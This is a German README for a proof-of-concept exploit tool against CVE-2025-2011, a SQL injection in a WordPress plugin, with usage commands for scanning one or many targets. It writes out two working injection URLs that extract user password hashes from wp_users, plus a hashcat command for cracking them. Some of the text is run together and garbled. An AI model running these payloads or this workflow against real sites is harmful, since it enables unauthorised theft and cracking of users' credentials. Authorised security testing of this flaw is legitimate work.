
Exploit für CVE-2025-2011
Von: X3RX3S Aber stolz abgekupfert von Ash Wesker, der meinen Code mit seinem Banner durch GPT gejagt hat ;) siehe hier ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Du kannst sogar meinen Handle in 'seinem' Code sehen -_-'
Zweck: Ein Proof-of-Concept-Tool zum Testen von WordPress-Sites auf eine SQL-Injection-Schwachstelle (CVE-2025-2011).
Haftungsausschluss: Verwende es nur auf Systemen, die dir gehören oder für die du eine ausdrückliche schriftliche Erlaubnis zum Testen hast. Unautorisierte Tests sind illegal und unethisch.

-p 1 oder -p 2)$2a$, $2b$, $2y$), einschließlich Varianten mit $wp$-Präfixresults_<hostname>.txt-m 3200) mit Abfrage-u) oder mehrere Ziele über eine Datei (-f)requestscoloramaAbhängigkeiten installieren:
pip install requests colorama
Optional (zum Cracken):
hashcat installiert und in deinem PATH verfügbar (Standard ist /usr/share/wordlists/rockyou.txt)/usr/share/wordlists/rockyou.txtSkript ausführbar machen (optional):
chmod +x CVE-2025-2011.py
Einzelnes Ziel (Standard-Payload 1):
python3 CVE-2025-2011.py -u https://example.com
Einzelnes Ziel (Payload 2):
python3 CVE-2025-2011.py -u https://example.com -p 2
Mehrere Ziele aus Datei (eine URL pro Zeile):
python3 CVE-2025-2011.py -f targets.txt
Für jeden getesteten Host speichert das Skript eine Ergebnisdatei:
results_<hostname>.txt
Wenn Bcrypt-Hashes gefunden werden, werden sie in hashes.txt gespeichert und du wirst gefragt, ob du sie mit Hashcat knacken möchtest. Beispiel-Hashcat-Befehl, der vom Skript verwendet wird:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
Hinweis: bcrypt ist konstruktionsbedingt langsam. Das Knacken kann sehr lange dauern und GPUs erfordern.
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
Dieses Tool dient ausschließlich Bildungs- und Verteidigungszwecken. Verwende es nicht gegen Systeme, für die du keine ausdrückliche Erlaubnis hast. Autor und Vertreiber übernehmen keine Verantwortung für Missbrauch. Hole immer eine schriftliche Genehmigung ein, bevor du Tests gegen Ziele durchführst, die dir nicht gehören.
run_hashcat im Skript, sodass sie auf deine bevorzugte Liste verweist.